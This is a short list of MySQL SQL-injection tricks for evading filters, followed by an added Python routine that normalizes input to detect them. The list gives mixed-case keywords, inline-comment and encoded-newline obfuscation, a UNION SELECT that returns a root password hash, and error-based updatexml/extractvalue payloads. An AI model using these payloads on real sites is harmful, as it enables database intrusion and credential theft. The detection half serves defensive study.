1. Mixed-case keywords

    mysql> SeLECt 1,2;
    +---+---+
    | 1 | 2 |
    +---+---+
    | 1 | 2 |
    +---+---+
    1 row in set (0.02 sec)

2. Inline comments

    mysql> /*!select*//**/1,2;
    +---+---+
    | 1 | 2 |
    +---+---+
    | 1 | 2 |
    +---+---+
    1 row in set (0.00 sec)

3. Line breaks

    mysql> select
        -> #abc
        -> 1,
        -> 2
        -> #abc
        -> ;
    +---+---+
    | 1 | 2 |
    +---+---+
    | 1 | 2 |
    +---+---+
    1 row in set (0.06 sec)

    url ----> select%0a%23abc%0a1,%0a2#23abc

4. Append xxx after the table name (MySQL parses xxx as a table alias)

    mysql> select user,password from user xxx union select(1),(2);
    +------+-------------------------------------------+
    | user | password                                  |
    +------+-------------------------------------------+
    | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
    | 1    | 2                                         |
    +------+-------------------------------------------+
    2 rows in set (0.08 sec)

5. Less commonly used functions

    and 1=(updatexml(1,concat(0x5c,(select user()),0x5c),1))
    and extractvalue(1, concat(0x5c, (select user()),0x5c));

Note that these two statements only work in error-based mode, and the MySQL version must be greater than 5.1.

P.S. More updates to follow.
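On the detection side, the five inputs above stop looking different once they are canonicalized the way the MySQL parser reads them. The following is an added example, not code from the original post: it URL-decodes, unwraps executable comments, strips comments, and folds whitespace and case before matching. The rule names and patterns are constructed for illustration, and the bounded re-decoding loop is an assumption beyond what the post covers.

```python
import re
from urllib.parse import unquote

# Illustrative signatures (constructed here); they expect lowercase, single-spaced text.
SIGNATURES = {
    "select_clause": re.compile(r"\bselect\s+\S"),
    "union_select": re.compile(r"\bunion\s*(?:all\s*|distinct\s*)?select\b"),
    "xml_error_function": re.compile(r"\b(?:updatexml|extractvalue)\s*\("),
}

EXEC_COMMENT = re.compile(r"/\*!(?:\d{5})?(.*?)\*/", re.S)  # /*!select*/ is executed
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)              # /**/ acts as whitespace
LINE_COMMENT = re.compile(r"(?:#|--(?=\s|$))[^\r\n]*")      # "#abc" up to end of line


def normalize(text: str) -> str:
    """Reduce a request parameter to roughly what the MySQL parser sees."""
    for _ in range(3):                      # bounded: also covers repeated encoding
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    text = EXEC_COMMENT.sub(r" \1 ", text)  # keep the body: the server runs it
    text = BLOCK_COMMENT.sub(" ", text)
    text = LINE_COMMENT.sub(" ", text)      # string literals are not parsed here
    return " ".join(text.split()).lower()   # newlines/tabs -> one space, fold case


def match_rules(text: str) -> list:
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def inspect(raw: str) -> list:
    return match_rules(normalize(raw))


# Inputs taken from items 1-5 above.
SAMPLES = [
    "SeLECt 1,2",
    "/*!select*//**/1,2",
    "select%0a%23abc%0a1,%0a2#23abc",
    "select user,password from user xxx union select(1),(2)",
    "and 1=(updatexml(1,concat(0x5c,(select user()),0x5c),1))",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r}\n  raw: {match_rules(sample)}  normalized: {inspect(sample)}")
```

Matching the same patterns against the raw strings misses the first three samples; after normalization all five are flagged.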